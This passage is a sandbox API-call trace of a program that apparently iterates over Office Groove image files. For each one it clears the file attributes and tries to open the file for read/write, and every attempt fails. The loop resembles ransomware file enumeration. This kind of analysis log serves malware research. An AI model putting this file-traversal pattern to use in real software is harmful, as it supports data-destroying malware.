files\\microsoft office\\office14\\groove\\toolbmps\\chessiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.847] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.847] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.847] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CreateSpaceImage.jpg", dwFileAttributes=0x80) returned 0 [0136.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CreateSpaceImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\createspaceimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.848] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.848] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.848] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.848] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CreateSpaceImageMask.bmp", dwFileAttributes=0x80) returned 0 [0136.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CreateSpaceImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\createspaceimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.848] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.848] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.849] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.849] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataListIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataListIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\datalisticonimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.849] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.849] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.849] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.849] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataListIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataListIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\datalisticonimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.850] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.850] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.850] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\dataviewiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.850] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.850] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.850] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\dataviewiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.851] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.851] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.851] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.852] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.852] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.852] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.852] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.853] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.854] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImage.jpg", dwFileAttributes=0x80) returned 0 [0136.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.855] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.855] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.855] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.855] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImageMask.bmp", dwFileAttributes=0x80) returned 0 [0136.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.855] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.855] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.855] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.855] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\GRIP.JPG", dwFileAttributes=0x80) returned 0 [0136.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\GRIP.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\grip.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.856] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\GRIPMASK.BMP", dwFileAttributes=0x80) returned 0 [0136.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\GRIPMASK.BMP" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\gripmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.857] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.857] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.857] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIcon.jpg", dwFileAttributes=0x80) returned 0 [0136.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.858] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.858] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.858] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIconMask.bmp", dwFileAttributes=0x80) returned 0 [0136.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationiconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.858] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.858] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.858] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginDialogBackground.jpg", dwFileAttributes=0x80) returned 0 [0136.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginDialogBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logindialogbackground.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.859] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.859] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.859] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.859] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg", dwFileAttributes=0x80) returned 0 [0136.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24images.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.860] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.860] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.860] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24ImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24imagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.860] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.860] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.861] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.861] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.862] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.862] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.862] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.862] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.863] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.863] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.864] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.864] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.864] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.864] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.864] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackground.jpg", dwFileAttributes=0x80) returned 0 [0136.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackground.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.865] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.865] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.865] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg", dwFileAttributes=0x80) returned 0 [0136.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackgroundrtl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.865] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.866] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.867] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.867] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierCloseButton.jpg", dwFileAttributes=0x80) returned 0 [0136.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierCloseButton.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierclosebutton.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.867] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.867] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.868] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.868] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg", dwFileAttributes=0x80) returned 0 [0136.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisabledownarrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.868] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.868] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.868] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg", dwFileAttributes=0x80) returned 0 [0136.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisableuparrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.869] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.869] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.869] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDownArrow.jpg", dwFileAttributes=0x80) returned 0 [0136.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdownarrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.869] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.869] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.869] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierUpArrow.jpg", dwFileAttributes=0x80) returned 0 [0136.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifieruparrow.jpg"), 